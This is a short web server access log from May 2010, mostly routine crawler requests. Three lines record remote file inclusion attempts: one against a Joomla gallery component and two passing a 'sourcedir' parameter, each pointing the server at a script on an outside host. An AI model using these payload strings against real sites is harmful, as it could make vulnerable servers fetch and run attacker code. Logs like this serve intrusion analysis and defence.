124.49.100.254 - - [04/May/2010:12:28:33 -0500] "GET /logs////index.php?option=com_ponygallery&Itemid=&mosConfig.absolute.path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
216.129.119.10 - - [04/May/2010:12:30:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
202.75.39.111 - - [04/May/2010:12:31:42 -0500] "GET /logs/?sourcedir=http://h1.ripway.com/bezad/idx? HTTP/1.1" 200 4241 "-""libwww-perl/5.833"
202.75.39.111 - - [04/May/2010:12:31:43 -0500] "GET /?sourcedir=http://h1.ripway.com/bezad/idx? HTTP/1.1" 200 1003 "-""libwww-perl/5.833"
87.250.255.243 - - [04/May/2010:12:31:51 -0500] "GET /logs/access_log.1271203200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
